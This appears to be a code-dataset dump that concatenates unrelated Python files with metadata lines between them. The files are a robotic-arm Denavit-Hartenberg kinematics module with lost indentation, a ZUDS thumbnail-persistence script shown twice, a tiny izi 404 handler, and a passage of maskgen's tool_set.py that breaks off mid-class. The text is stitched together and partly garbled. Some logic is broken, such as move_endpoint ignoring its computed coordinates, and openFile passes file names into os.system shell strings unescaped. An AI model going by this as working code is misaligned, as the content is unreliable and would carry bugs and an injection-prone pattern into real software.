"""Method to setting joints with D-H parameters.
Args:
joint_configs (list): The joint list from the config file.
"""
self.joint_count = len(joint_configs)
for joint_conf in joint_configs:
joint = Joint(joint_conf, self.use_ext_driver)
self.joints.append(joint)
if joint.structure != "constant":
self.current_pos_as_theta.append(joint.current_angle)
self.__prepare_dh_params()
def __pull_model(self):
"""Method to pull arm D-H model from database via an ArmModeller instance.
"""
model = ArmModeler().get(self.name)
if model:
logger.debug("model creating...")
self.alpha = model["alpha"]
self.a = model["a"]
self.q = model["q"]
self.d = model["d"]
self.dh_params = model["dh_params"]
self.tf_matrices_list = model["transform_matrices"]
self.jacobian_matrix = model["jacobian_matrix"]
else:
ArmModeler().create(self.name)
self.__pull_model()
def __prepare_dh_params(self):
"""Method to preparing D-H parameters of Arm.
"""
self.alpha = symbols('alpha0:' + str(self.joint_count))
self.a = symbols('a0:' + str(self.joint_count))
self.q = symbols('q1:' + str(self.joint_count + 1))
self.d = symbols('d1:' + str(self.joint_count + 1))
def __set_dh_params(self, joints):
"""Method to setting joint's D-H parameters.
Args:
joints (list): The arm's joints list for preparing parameters of Denavit-Hartenberg chart.
"""
self.dh_params = {}
for i in range(len(joints)):
self.dh_params[self.alpha[i]] = joints[i].alpha
self.dh_params[self.a[i]] = joints[i].a
if joints[i].structure == 'revolute':
self.dh_params[self.q[i]] = self.q[i]
self.dh_params[self.d[i]] = joints[i].d
elif joints[i].structure == 'prismatic':
self.dh_params[self.q[i]] = joints[i].q
self.dh_params[self.d[i]] = self.d[i]
elif joints[i].structure == 'constant':
self.dh_params[self.q[i]] = joints[i].q
self.dh_params[self.d[i]] = joints[i].d
self.__set_transform_matrices()
def show_dh_params(self):
"""Method to getting D-H parameters of joints of Arm as string message.
"""
print(f'DH Parameters are: {self.dh_params}')
def __set_transform_matrices(self):
"""Method to setting D-H transform matrices.
"""
self.tf_matrices_list = []
transform_matrix = eye(4) # creates a unit matrix via passing argument.
for i in range(self.joint_count):
transform_matrix = transform_matrix * self.__create_tf_matrix(self.alpha[i], self.a[i], self.d[i], self.q[i]).subs(self.dh_params)
self.tf_matrices_list.append(transform_matrix)
def show_transform_matrices(self):
"""Method to getting D-H parameters of joints of Arm as string message.
"""
print(f'Transform Matrices are: {self.tf_matrices_list}')
@staticmethod
def __create_tf_matrix(alpha, a, d, q):
"""Method to calculate transform matrix of Denavit-Hartenberg Method.
Args:
alpha: The twist angle. Axis angle between consecutive two axes.
a: The limb length between consecutive two axis.
d: link offset. The displacement along the same axis.
q: The rotation theta angle about the joint axis.
Returns:
object: The Denavit-Hartenberg transform matrix object.
"""
tf_matrix = Matrix([[cos(q), -sin(q), 0., a],
[sin(q) * cos(alpha), cos(q) * cos(alpha), -sin(alpha), -sin(alpha) * d],
[sin(q) * sin(alpha), cos(q) * sin(alpha), cos(alpha), cos(alpha) * d],
[0., 0., 0., 1.]])
return tf_matrix
@staticmethod
def get_coords_from_forward_kinematics(forward_kinematics_result):
"""Method to get cartesian coords from calculated forward kinematics result of the Arm.
Args:
forward_kinematics_result (list): result of the forward kinematics calculation.
Returns:
list: The cartesian coordinate position of Arm's farthest point as millimeter list.
"""
return [current_pos[0] for current_pos in forward_kinematics_result]
def __forward_kinematics(self, theta_list):
"""Method to calculate forward kinematics of the Arm.
Args:
theta_list (list): The list of current joints angles.
Returns:
list: The cartesian coordinate position of Arm's farthest point as theta list.
"""
to_current_pos = []
theta_dict = {}
tf_matrix_first_to_last = self.tf_matrices_list[-1]
for i in range(len(theta_list)):
theta_dict[self.q[i]] = theta_list[i]
theta_dict[self.q[-1]] = self.q[-1]
temp = tf_matrix_first_to_last.evalf(subs=theta_dict, chop=True, maxn=4)
x = [np.array(temp[0, -1]).astype(np.float64)]
y = [np.array(temp[1, -1]).astype(np.float64)]
z = [np.array(temp[2, -1]).astype(np.float64)]
to_current_pos.append(np.array([x, y, z]))
return to_current_pos # to_current_pos is something like [[22], [23], [20]]
def __calc_jacobian_matrix(self):
"""Method to calculate jacobian matrix of Arm's General Denavit-Hartenberg Transform Matrix.
"""
tf_matrix_first_to_last = self.tf_matrices_list[-1]
self.jacobian_matrix = [diff(tf_matrix_first_to_last[:3, -1], self.q[i]).reshape(1, 3) for i in range(len(self.q))]
self.jacobian_matrix = Matrix(self.jacobian_matrix).T # .T returns the transpose of matrix.
def __inverse_kinematics(self, guess, target_point):
"""Method to calculate inverse kinematics of the Arm.
Args:
guess: The twist angle. Axis angle between consecutive two axes.
target_point (list): Target point's coordinates as X, Y, Z respectively.
Returns:
list: The angular position list of joints by the target point. (unit: radian)
"""
error = 1.0
tolerance = 0.05
# Initial Guess - Joint Angles
thetas = np.matrix(guess) # thetas is list which is contain all axes theta angles.
target_point = np.matrix(target_point) # X, Y, Z list to matrix for Target Position
# print(target_point.shape)
# Jacobian
self.__calc_jacobian_matrix()
tf_matrix_first_to_last = self.tf_matrices_list[-1]
error_grad = []
theta_dict = {}
lr = 0.2
while error > tolerance:
for i in range(len(np.array(thetas)[0])):
theta_dict[self.q[i]] = np.array(thetas)[0][i]
theta_dict[self.q[-1]] = self.q[-1]
calculated_target_point = np.matrix(self.get_coords_from_forward_kinematics(self.__forward_kinematics(np.array(thetas)[0])[-1]))
logger.debug(f'calculated target point is \n{calculated_target_point}')
diff_wanted_calculated = target_point - calculated_target_point
jacob_mat = np.matrix(self.jacobian_matrix.evalf(subs=theta_dict, chop=True, maxn=4)).astype(np.float64).T
logger.debug(f'jacobian matrix is\n{jacob_mat} \n\n diff is \n {diff_wanted_calculated}')
thetas = thetas + lr * (jacob_mat * diff_wanted_calculated.T)
# thetas = np.array(thetas)[0] # this line's purpose is changing Q from matrix level to array level.
prev_error = error
error = linalg.norm(diff_wanted_calculated)
if error > 10 * tolerance:
lr = 0.3
elif error < 10 * tolerance:
lr = 0.2
error_grad.append((error - prev_error))
# print(error)
return np.array(thetas)[0]
def path_plan(self, guess, target_list, time, acceleration):
Q_list = []
for target in target_list:
Q = self.__inverse_kinematics(guess, target)
predicted_coordinates = self.__forward_kinematics(Q)[-1]
logger.info(f'Target: {target} , Predicted: {predicted_coordinates}')
Q_list.append(Q)
guess = Q
# print(np.matrix(Q_list), np.matrix(Q_list).shape)
Q_matrix = np.matrix(Q_list)
theta_all, omega_all, acceleration_all = lpsb.trajectory_planner(Q_matrix, time, acceleration, 0.01)
return Q_list
def goto_position(self, polar_params=None, cartesian_coords=None):
"""Method to go to given position via position angles or coordinates of the Arm.
If the target position is given with angles, cartesian coordinates have been created,
else cartesian coordinates given the joints angles create.
Args:
polar_params (dict): Angular position dictionary to go. Keeps theta, divide_count and delay lists and the length of this lists equals to joint count.
cartesian_coords (list): Cartesian position list to go. List length equals to 3 for 3 dimensions of the cartesian coordinate system.
"""
if cartesian_coords and polar_params:
self.__rotate_joints(polar_params)
elif polar_params:
self.__rotate_joints(polar_params)
cartesian_coords = self.get_coords_from_forward_kinematics(self.__forward_kinematics(polar_params["coords"])[-1])
elif cartesian_coords:
polar_params["coords"] = self.__inverse_kinematics([0, 0, 0], cartesian_coords)
self.__rotate_joints(polar_params)
else:
raise Exception('Going to position requires angle or coordinate!')
self.current_pos_as_theta = []
self.current_pos_as_coord = []
for coord in polar_params["coords"]:
self.current_pos_as_theta.append(coord)
for coord in cartesian_coords:
self.current_pos_as_coord.append(coord)
@dispatch(list)
def __rotate_joints(self, pos_thetas):
"""Method to rotate all joints according to given position theta angles.
Args:
pos_thetas (list): Angular position list to go. List length equals to joint count.
"""
joint_threads = []
for joint in self.joints:
if joint.structure != "constant":
joint_thread = threading.Thread(target=joint.move_to_angle, args=(float(pos_thetas[joint.number - 1]),))
joint_threads.append(joint_thread)
joint_thread.start()
return self.__check_until_threads_ends(joint_threads)
@dispatch(dict)
def __rotate_joints(self, polar_params):
"""Method to rotate all joints according to given position theta angles.
Args:
polar_params (dict): Angular position list to go. List length equals to joint count.
"""
joint_threads = []
for joint in self.joints:
if joint.structure != "constant":
joint_thread = threading.Thread(target=joint.move_to_angle, args=(polar_params["coords"][joint.number - 1], int(polar_params["divide_counts"][joint.number - 1]), float(polar_params["delays"][joint.number - 1])))
joint_threads.append(joint_thread)
joint_thread.start()
# for joint_thread in joint_threads:
# joint_thread.start()
return self.__check_until_threads_ends(joint_threads)
def rotate_joints(self, pan_params, tilt_params):
"""Method to rotate all joints according to given position theta angles.
Args:
pan_params (dict): Control parameters for pan rotation joints.
tilt_params (dict): Control parameters for tilt rotation joints.
"""
for joint in self.joints:
if joint.structure != 'constant':
thread_direction = None
if joint.rotation_type == "pan":
thread_direction = pan_params["direction"]
joint.motor_thread_stop = pan_params["stop"]
elif joint.rotation_type == "tilt":
thread_direction = tilt_params["direction"]
joint.motor_thread_stop = tilt_params["stop"]
if not joint.is_reverse:
joint.motor_thread_direction = not thread_direction
else:
joint.motor_thread_direction = thread_direction
if joint.motor_thread.is_alive():
pass
else:
if not joint.motor_thread_stop:
joint.motor_thread = threading.Thread(target=joint.motor.change_position_incregular, args=(lambda: joint.motor_thread_stop, lambda: joint.motor_thread_direction, 3))
joint.motor_thread.start()
@staticmethod
def __check_until_threads_ends(threads):
"""Method to check given threads recursively until all of them ends.
Args:
threads (list): Thread list that been checked.
"""
for thread in threads:
if thread.is_alive():
thread.join()
return True
def rotate_single_joint(self, joint_number, delta_angle, direction=None):
"""Method to move a single joint towards the given direction with the given variation.
Args:
joint_number (int): Number of one of arm's joints.
delta_angle (float): Angle to rotate. In degree.
direction (bool): Rotate direction. True means CW, otherwise CCW.
"""
if direction is None:
direction = False
if delta_angle <= 0:
direction = True
delta_angle = abs(delta_angle)
for i in range(len(self.joints)):
if self.joints[i].structure != "constant":
if self.joints[i].number == joint_number:
self.joints[i].change_angle_by(float(delta_angle), direction)
try:
self.current_pos_as_theta[i] = self.joints[i].current_angle
except IndexError:
logger.critical(f'current_pos_as_theta list of Arm has IndexError!')
# self.current_pos_as_coord = self.get_coords_from_forward_kinematics(self.__forward_kinematics(self.current_pos_as_theta)[-1])
def move_endpoint(self, axis, distance):
"""Method to move endpoint of the arm with the given axis and the distance.
Args:
axis (str): Number of one of arm's joints.
distance (int): Moving distance.
"""
current_pos_as_coord = self.current_pos_as_coord
cartesian_coords = {"x": current_pos_as_coord[0], "y": current_pos_as_coord[1], "z": current_pos_as_coord[2]}
cartesian_coords[axis] += distance
self.goto_position(cartesian_coords=current_pos_as_coord)
def get_current_positions(self):
"""Method to send current positions.
Returns:
dict: Response
"""
self.current_pos_as_coord = self.get_coords_from_forward_kinematics(self.__forward_kinematics(self.current_pos_as_theta)[-1])
return {"cartesian_coords": self.current_pos_as_coord, "polar_coords": self.current_pos_as_theta}
def ang_diff(self, theta1, theta2):
"""
Returns the difference between two angles in the range -pi to +pi
"""
return (theta1 - theta2 + np.pi) % (2 * np.pi) - np.pi | en | 0.740492 | #!/usr/bin/python3 # -*- coding: utf-8 -*- .. module:: arm :platform: Unix :synopsis: the top-level submodule of T_System that contains the classes related to T_System's motion ability. .. moduleauthor:: <NAME> <<EMAIL>> Class to define the joint of N-axis motion arm. This class provides necessary initiations and a function named :func:`t_system.motor.Motor.move` for the provide move of servo motor. Initialization method of :class:`t_system.motion.arm.Joint` class. Args: joint (dict): The requested_data that is contain joint's properties from the config file. use_ext_driver (bool): The flag of external PWM driver activation. The top-level method to provide servo motors moving. Args: target_angle (float): The target angle of servo motors. In radian Unit. The top-level method to provide servo motors moving. Args: target_angle (float): The target angle of servo motors. In radian Unit. divide_count (int): The count that specify motor how many steps will use. delay (float): delay time between motor steps. The top-level method to provide servo motors moving. Args: delta_angle (float): Angle to rotate. In degree. direction (bool): Rotate direction. True means CW, otherwise CCW. The top-level method to provide servo motors moving. Args: delta_angle (float): Angle to rotate. In degree. divide_count (int): The count that specify motor how many steps will use. delay (float): delay time between motor steps. direction (bool): Rotate direction. True means CW, otherwise CCW. Method to calculate target angle with the given variation angle value. Args: delta_angle (float): Calculated theta angle for going to object position. In radian type. direction (bool): Rotate direction. True means CW, otherwise CCW. # this mines (-) for cw. Method to provide stop the GPIO.PWM services that are reserved for the joint's servo motor. Method to provide clean the GPIO pins that are reserved for the collimator's servo motor. Class to define a N-axis arm for motion ability of tracking system. This class provides necessary initiations and a function named :func:`t_system.motor.Motor.move` for the provide move of servo motor. Initialization method of :class:`t_system.motion.arm.Arm` class. Args: arm_name (str): Name of the arm. From config file or user choice. use_ext_driver (bool): The flag of external PWM driver activation. # config file returns the arms. # self.current_pos_as_coord = self.get_coords_from_forward_kinematics(self.__forward_kinematics(self.current_pos_as_theta)[-1]) Method to expand arm with using target_locker of t_system's vision. Args: current_angles (list): Current angles of the arm's expanded joints. # config file returns the arms. # self.current_pos_as_coord = self.get_coords_from_forward_kinematics(self.__forward_kinematics(self.current_pos_as_theta)[-1]) Method to revert back the expansion. # config file returns the arms. # config file returns the arms. # self.current_pos_as_coord = self.get_coords_from_forward_kinematics(self.__forward_kinematics(self.current_pos_as_theta)[-1]) Method to return expansion flag of the arm. Method to setting joints with D-H parameters. Args: joint_configs (list): The joint list from the config file. Method to pull arm D-H model from database via an ArmModeller instance. Method to preparing D-H parameters of Arm. Method to setting joint's D-H parameters. Args: joints (list): The arm's joints list for preparing parameters of Denavit-Hartenberg chart. Method to getting D-H parameters of joints of Arm as string message. Method to setting D-H transform matrices. # creates a unit matrix via passing argument. Method to getting D-H parameters of joints of Arm as string message. Method to calculate transform matrix of Denavit-Hartenberg Method. Args: alpha: The twist angle. Axis angle between consecutive two axes. a: The limb length between consecutive two axis. d: link offset. The displacement along the same axis. q: The rotation theta angle about the joint axis. Returns: object: The Denavit-Hartenberg transform matrix object. Method to get cartesian coords from calculated forward kinematics result of the Arm. Args: forward_kinematics_result (list): result of the forward kinematics calculation. Returns: list: The cartesian coordinate position of Arm's farthest point as millimeter list. Method to calculate forward kinematics of the Arm. Args: theta_list (list): The list of current joints angles. Returns: list: The cartesian coordinate position of Arm's farthest point as theta list. # to_current_pos is something like [[22], [23], [20]] Method to calculate jacobian matrix of Arm's General Denavit-Hartenberg Transform Matrix. # .T returns the transpose of matrix. Method to calculate inverse kinematics of the Arm. Args: guess: The twist angle. Axis angle between consecutive two axes. target_point (list): Target point's coordinates as X, Y, Z respectively. Returns: list: The angular position list of joints by the target point. (unit: radian) # Initial Guess - Joint Angles # thetas is list which is contain all axes theta angles. # X, Y, Z list to matrix for Target Position # print(target_point.shape) # Jacobian # thetas = np.array(thetas)[0] # this line's purpose is changing Q from matrix level to array level. # print(error) # print(np.matrix(Q_list), np.matrix(Q_list).shape) Method to go to given position via position angles or coordinates of the Arm. If the target position is given with angles, cartesian coordinates have been created, else cartesian coordinates given the joints angles create. Args: polar_params (dict): Angular position dictionary to go. Keeps theta, divide_count and delay lists and the length of this lists equals to joint count. cartesian_coords (list): Cartesian position list to go. List length equals to 3 for 3 dimensions of the cartesian coordinate system. Method to rotate all joints according to given position theta angles. Args: pos_thetas (list): Angular position list to go. List length equals to joint count. Method to rotate all joints according to given position theta angles. Args: polar_params (dict): Angular position list to go. List length equals to joint count. # for joint_thread in joint_threads: # joint_thread.start() Method to rotate all joints according to given position theta angles. Args: pan_params (dict): Control parameters for pan rotation joints. tilt_params (dict): Control parameters for tilt rotation joints. Method to check given threads recursively until all of them ends. Args: threads (list): Thread list that been checked. Method to move a single joint towards the given direction with the given variation. Args: joint_number (int): Number of one of arm's joints. delta_angle (float): Angle to rotate. In degree. direction (bool): Rotate direction. True means CW, otherwise CCW. # self.current_pos_as_coord = self.get_coords_from_forward_kinematics(self.__forward_kinematics(self.current_pos_as_theta)[-1]) Method to move endpoint of the arm with the given axis and the distance. Args: axis (str): Number of one of arm's joints. distance (int): Moving distance. Method to send current positions. Returns: dict: Response Returns the difference between two angles in the range -pi to +pi | 2.467145 | 2 |
scripts/dothumb.py | charlotteaward/zuds-pipeline | 7 | 6616726 | <reponame>charlotteaward/zuds-pipeline
import sys
import time
import zuds
zuds.init_db()
# db.DBSession().autoflush = False
# db.DBSession().get_bind().echo = True
__author__ = '<NAME> <<EMAIL>>'
__whatami__ = 'Make the subtractions for ZUDS.'
infile = sys.argv[1] # file listing all the subs to do photometry on
BATCH_SIZE = 50
my_work = zuds.get_my_share_of_work(infile)
def batch(iterable, n=1):
l = len(iterable)
for ndx in range(0, l, n):
yield iterable[ndx:min(ndx + n, l)]
for thumbids in batch(my_work, n=BATCH_SIZE):
start = time.time()
thumbs = zuds.DBSession().query(zuds.Thumbnail).filter(zuds.Thumbnail.id.in_(thumbids.tolist()))
for t in thumbs:
t.persist()
stop = time.time()
zuds.print_time(start, stop, t, 'get and persist')
start = time.time()
zuds.DBSession().commit()
stop = time.time()
zuds.print_time(start, stop, t, 'commit')
| import sys
import time
import zuds
zuds.init_db()
# db.DBSession().autoflush = False
# db.DBSession().get_bind().echo = True
__author__ = '<NAME> <<EMAIL>>'
__whatami__ = 'Make the subtractions for ZUDS.'
infile = sys.argv[1] # file listing all the subs to do photometry on
BATCH_SIZE = 50
my_work = zuds.get_my_share_of_work(infile)
def batch(iterable, n=1):
l = len(iterable)
for ndx in range(0, l, n):
yield iterable[ndx:min(ndx + n, l)]
for thumbids in batch(my_work, n=BATCH_SIZE):
start = time.time()
thumbs = zuds.DBSession().query(zuds.Thumbnail).filter(zuds.Thumbnail.id.in_(thumbids.tolist()))
for t in thumbs:
t.persist()
stop = time.time()
zuds.print_time(start, stop, t, 'get and persist')
start = time.time()
zuds.DBSession().commit()
stop = time.time()
zuds.print_time(start, stop, t, 'commit') | en | 0.549932 | # db.DBSession().autoflush = False # db.DBSession().get_bind().echo = True # file listing all the subs to do photometry on | 2.38568 | 2 |
examples/override_404.py | izi-global/izir | 0 | 6616727 | <reponame>izi-global/izir<filename>examples/override_404.py
import izi
@izi.get()
def hello_world():
return 'Hello world!'
@izi.not_found()
def not_found():
return {'Nothing': 'to see'}
| import izi
@izi.get()
def hello_world():
return 'Hello world!'
@izi.not_found()
def not_found():
return {'Nothing': 'to see'} | none | 1 | 1.954177 | 2 | |
maskgen/tool_set.py | j-h-m/Media-Journaling-Tool | 0 | 6616728 | <reponame>j-h-m/Media-Journaling-Tool
# =============================================================================
# Authors: PAR Government
# Organization: DARPA
#
# Copyright (c) 2016 PAR Government
# All rights reserved.
# ==============================================================================
import imghdr
import math
import platform
import re
import sys
import threading
import warnings
from datetime import datetime
from subprocess import Popen, PIPE
from scipy import ndimage
from skimage.measure import compare_ssim
import cv2api
import loghandling
import maskgen.exif
from ffmpeg_api import get_ffprobe_tool, ffmpeg_overlay
from image_wrap import *
from maskgen.support import removeValue, getValue
from maskgen.userinfo import get_username
from maskgen_loader import MaskGenLoader
imagefiletypes = [("jpeg files", "*.jpg"), ("png files", "*.png"), ("tiff files", "*.tiff"), ("tiff files", "*.tif"),
("Raw NEF", "*.nef"), ("ARW Sony", "*.arw"), ("CRW Canon", "*.crw"), ("raw panasonic", "*.raw"),
("Raw 2 Panasonic", "*.rw2"), ("ORF Olympus", "*.orf"), ("MDC Minolta", "*.mdc"),
("PTX Pentax", "*.ptx"),
("PEF Pentax", "*.pef"), ("MRW Minolta", "*.nrw"), ("Adobe", "*.dng"),
("bmp files", "*.bmp"), ("pdf files", "*.pdf"), ('cr2', '*.cr2'), ('raf Fuji', '*.raf'),
("NITF files","*.ntf"),("NITF files","*.nitf"),('JP2','*.jp2'), ('Lytro Raw','*.lfr'),
("High Efficiency Image File Format", "*.heic"), ("High Efficiency Image File Format", "*.heif")]
videofiletypes = [("mpeg files", "*.mp4"), ("mov files", "*.mov"), ('wmv', '*.wmv'), ('m4p', '*.m4p'), ('m4v', '*.m4v'),
('f4v', '*.flv'), ("avi files", "*.avi"), ('asf', '*.asf'), ('mts', '*.mts'), ('3gp', '*.3gp'),
('mxf', '*.mxf')]
audiofiletypes = [("mpeg audio files", "*.m4a"), ("mpeg audio files", "*.m4p"), ("mpeg audio files", "*.mp3"),
("raw audio files", "*.raw"), ("Audio Interchange File", "*.aif"),
("Audio Interchange File", "*.aiff"),
("Standard PC audio files", "*.wav"), ("Windows Media audio files", "*.wma")]
zipfiletypes = [('zip of images','*.zip'),('zip of images','*.gz'),('zip of images','*.tgz')]
textfiletypes = [("CSV file", "*.csv"), ("json file", "*.json"), ("text file", "*.txt"), ("log file","*.log")]
suffixes = [".nef", ".jpg", ".png", ".tiff", ".bmp", ".avi", ".mp4", ".mov", ".wmv", ".ppm", ".pbm", ".mdc",".gif",
".raf", ".ptx", ".pef", ".mrw",".dng", ".zip",".gz", ".cr2",".jp2",
".wav", ".wma", ".m4p", ".mp3", ".m4a", ".raw", ".asf", ".mts",".tif",".arw",".orf",".raw",".rw2",".crw"]
maskfiletypes = [("png files", "*.png"), ("zipped masks", "*.tgz")]
modelfiletypes = [('3D Studio', '*.3ds'), ('Blender', '*.blen'), ('Collada', '*.dae'), ('AutoCAD', '*.dxf'),
('Autodesk Exchange', '*.fbx'), ('geoTIFF', '*.tif'), ('gITF', '*.gITF'), ('Lightwave', '*.lwo'),
('OBJ Files', '*.obj'), ('OFF File', '*.off'), ('PLY Files', '*.ply'), ('PTS Files', '*.pts'),
('PTX Files', '*.ptx'), ('Sculptris', '*.sc1'), ('Pro/ENGINEER', '*.scl'),
('Google Sketchup', '*.skp'), ('STL File', '*.stl'), ('TRI Files', '*.tri'), ('V3D Files', '*.v3d'),
('VRML (WRL Files)', '*.wrl'), ('X3D Files', '*.x3d'), ('X3DV Files', '*.x3dv'),
('SoftImage', '*.xsi'), ('ZBrush', '*.ztl'), ('XYZ Files', '*.xyz')]
class S3ProgessComposite(object):
def __init__(self,progress_monitors = []):
self.progress_monitors = progress_monitors
def __call__(self, bytes_amount):
for pm in self.progress_monitors:
pm(bytes_amount)
class S3ProgressPercentage(object):
def __init__(self, filename, log = None):
self._filename = filename
self._size = float(os.path.getsize(filename))
self._seen_so_far = 0
self._percentage_so_far = 0
self._lock = threading.Lock()
self.log = log if log is not None else logging.getLogger('maskgen').info
def __call__(self, bytes_amount):
# To simplify we'll assume this is hooked up
# to a single filename.
with self._lock:
self._seen_so_far += bytes_amount
percentage = (self._seen_so_far / self._size) * 100
if (percentage - self._percentage_so_far) > 5:
self.log(
"%s %s / %s (%.2f%%)" % (
self._filename, self._seen_so_far, self._size,
percentage))
self._percentage_so_far = percentage
def exportlogsto3(location, last_uploaded):
import boto3
loghandling.flush_logging()
logging_file = get_logging_file()
if logging_file is not None and last_uploaded != logging_file:
logging_file_name = os.path.split(logging_file)[1]
s3 = boto3.client('s3', 'us-east-1')
bucket = location.split('/')[0].strip()
directory = location[location.find('/') + 1:].strip()
directory = directory[:-1] if directory.endswith('/') else directory
directory = directory[:directory.rfind('/') + 1:].strip() + "logs/"
try:
s3.upload_file(logging_file, bucket, directory + get_username() + '_' + logging_file_name)
except:
logging.getLogger('maskgen').error("Could not upload prior log file to " + directory)
return logging_file
def fetchbyS3URL(url):
import boto3
location = url[5:] if url.startswith('s3://') else url
parts = location.split('/')
BUCKET = parts[0].strip()
location = location[location.find('/') + 1:].strip()
file = parts[-1]
s3 = boto3.resource('s3')
destination = os.path.join('.', file)
my_bucket = s3.Bucket(BUCKET)
my_bucket.download_file(location, destination)
return destination
def get_icon(name):
places = [] # ['./icons']
places.extend([os.path.join(x, 'icons/' + name) for x in sys.path if ('maskgen' in x or not x.endswith('egg')) and \
os.path.exists(os.path.join(x, 'icons'))])
for place in places:
if os.path.exists(place):
return place
return None
def get_logging_file():
"""
:return: The last roll over log file
"""
newest = None
newest_time = None
filename = 'maskgen.log.'
for item in os.listdir('.'):
if item.startswith(filename):
t = os.stat(item).st_ctime
if newest_time is None or newest_time < t:
newest = item
newest_time = t
return newest
def getImageFileTypes():
prefLoader = MaskGenLoader()
filetypes = prefLoader.get_key('filetypes')
filetypes = [] if filetypes is None else filetypes
types = [tuple(x) for x in filetypes]
tset = set([x[1] for x in types])
for suffix in getFileTypes():
if suffix[1] not in tset:
types.append(suffix)
return types
def getMaskFileTypes():
return maskfiletypes
def getFileTypes():
return imagefiletypes + videofiletypes + audiofiletypes + zipfiletypes
def fileTypeChanged(file_one, file_two):
"""
Return: True if the file types of the two provided files do not match
"""
try:
one_type = fileType(file_one)
two_type = fileType(file_two)
return one_type != two_type
except:
return os.path.splitext(file_one)[1].lower() != os.path.splitext(file_two)[1].lower()
def runCommand(command,outputCollector=None):
p = Popen(command, stdout=PIPE, stderr=PIPE)
stdout, stderr = p.communicate()
errors = []
if p.returncode == 0:
if outputCollector is not None:
for line in stdout.splitlines():
outputCollector.append(line)
if p.returncode != 0:
try:
if stderr is not None:
for line in stderr.splitlines():
if len(line) > 2:
errors.append(line)
except OSError as e:
errors.append(str(e))
return errors
def isVideo(filename):
ffmpegcommand = [get_ffprobe_tool(), filename]
try:
p = Popen(ffmpegcommand, stdout=PIPE, stderr=PIPE)
stdout, stderr = p.communicate()
return stderr.find('Invalid data') < 0
except:
return False
def getMimeType(filename):
import subprocess
import shlex
cmd = shlex.split('file --mime-type "{0}"'.format(filename))
try:
result = subprocess.check_output(cmd)
return (result.split(':')[1]).split('/')[0].strip()
except Exception as e:
logging.getLogger('maskgen').error('Cannot determine file type for "{}": {}'.format(
filename,
str(e)
))
raise ValueError('Cannot determine file type for "{}"'.format(
filename
))
def zipFileType(fileName):
parts = fileName.lower().split('.')
if parts[-1] not in ['zip','gz','tgz']:
return None
return fileType('.'.join(parts[0:-1]))
def fileType(fileName):
if os.path.isdir(fileName):
return 'dir'
lowerName = fileName.lower()
suffixes = lowerName.split('.')
suffix = '*.' + suffixes[-1] if len(suffixes) > 0 else ''
file_type = None
if suffix in ['*.zip', '*.tgz', '*.gz']:
file_type = 'zip'
if len(suffixes) > 2:
content_type = '*.' + suffixes[-2]
if content_type not in [x[1] for x in imagefiletypes]:
file_type = 'collection'
elif suffix in [x[1] for x in imagefiletypes] or (os.path.exists(fileName) and imghdr.what(fileName) is not None):
file_type = 'image'
elif suffix in [x[1] for x in audiofiletypes]:
file_type = 'audio'
elif suffix in [x[1] for x in textfiletypes]:
file_type = 'text'
elif suffix in [x[1] for x in videofiletypes] or isVideo(fileName):
file_type = 'video'
return getMimeType(fileName) if file_type is None else file_type
def getOS():
return platform.system() + ' ' + platform.release() + ' ' + platform.version()
def openFile(fileName):
"""
Open a file using a native OS associated program
"""
import sys
if fileName.endswith('.hdf5'):
fileName = convertToVideo(fileName, preferences=MaskGenLoader())
if sys.platform.startswith('linux'):
os.system('xdg-open "' + fileName + '"')
elif sys.platform.startswith('win'):
os.startfile(fileName)
else:
os.system('open "' + fileName + '"')
class IntObject:
value = 0
def __init__(self):
pass
def set(self, value):
self.value = value
def increment(self):
self.value += 1
return self.value
def imageResize(img, dim):
"""
:param img:
:param dim:
:return:
@rtype: ImageWrapper
"""
return img.resize(dim, Image.ANTIALIAS).convert('RGBA')
def imageResizeRelative(img, dim, otherImDim):
"""
Preserves the dimension ratios_
:param dim:
:param otherImDim: dimensions of other image
:return: Resized relative to width given the maximum constraints
@rtype: ImageWrapper
"""
if otherImDim is None and img is not None:
otherImDim = img.size
if img is None:
img = ImageWrapper(np.zeros((otherImDim[1], otherImDim[0]), dtype=np.uint8))
wmax = max(img.size[0], otherImDim[0])
hmax = max(img.size[1], otherImDim[1])
wpercent = float(dim[0]) / float(wmax)
hpercent = float(dim[1]) / float(hmax)
perc = min(wpercent, hpercent)
wsize = int((float(img.size[0]) * float(perc)))
hsize = int((float(img.size[1]) * float(perc)))
return img.resize((wsize, hsize), Image.ANTIALIAS)
def validateCoordinates(v):
"""
Coordinates are [x,y] or (x,y) or x,y where x and y are integers.
Return False if the coordinates are invalid.
"""
try:
return len([int(re.sub('[()]', '', x)) for x in v.split(',')]) == 2
except ValueError:
return False
def sumMask(mask):
return int(np.sum(mask))
class VidTimeManager:
"""
frameCountWhenStarted: record the frame at start
frameCountWhenStopped: record the frame at finish
"""
def __init__(self, startTimeandFrame=None, stopTimeandFrame=None):
self.startTimeandFrame = startTimeandFrame
self.stopTimeandFrame = stopTimeandFrame
#if startTimeandFrame is not None and startTimeandFrame[1] > 0 and startTimeandFrame[0] > 0:
# self.startTimeandFrame = (startTimeandFrame[0],startTimeandFrame[1]+1)
#if stopTimeandFrame is not None and stopTimeandFrame[1] > 0 and stopTimeandFrame[0] > 0:
# self.stopTimeandFrame = (stopTimeandFrame[0],stopTimeandFrame[1]+1)
self.pastEndTime = False
self.beforeStartTime = True if startTimeandFrame else False
self.reachedEnd = False
self.milliNow = 0
self.frameCountWhenStopped = 0
self.frameCountWhenStarted = 0
self.frameSinceBeginning = 0
self.frameCountSinceStart = 0
self.frameCountSinceStop = 0
def isAtBeginning(self):
return self.startTimeandFrame is None or (self.startTimeandFrame[0] < 0 and self.startTimeandFrame[1] < 2)
def spansToEnd(self):
return self.stopTimeandFrame is None or (self.stopTimeandFrame[0] is None and self.stopTimeandFrame[1] is None)
def getExpectedStartFrameGiveRate(self, rate, defaultValue=None):
if not self.startTimeandFrame:
return defaultValue
return self.startTimeandFrame[1] + (self.startTimeandFrame[0] / 1000.0) * float(rate)
def getExpectedEndFrameGiveRate(self, rate, defaultValue=None):
if not self.stopTimeandFrame:
return defaultValue
val = int(self.stopTimeandFrame[1] + (self.stopTimeandFrame[0] / 1000.0) * float(rate))
if val == 0:
return defaultValue
return self.stopTimeandFrame[1] + (self.stopTimeandFrame[0] / 1000.0) * float(rate)
def getStartFrame(self):
return self.frameCountWhenStarted if self.startTimeandFrame else 1
def getEndFrame(self):
return self.frameCountWhenStopped if self.stopTimeandFrame and self.frameCountWhenStopped else self.frameSinceBeginning
def updateToNow(self, milliNow, frames=1):
"""
:param milliNow: time after the frame is to be displayed or sound emitted
:param frames:
:return:
"""
self.milliNow = milliNow
self.frameSinceBeginning += frames
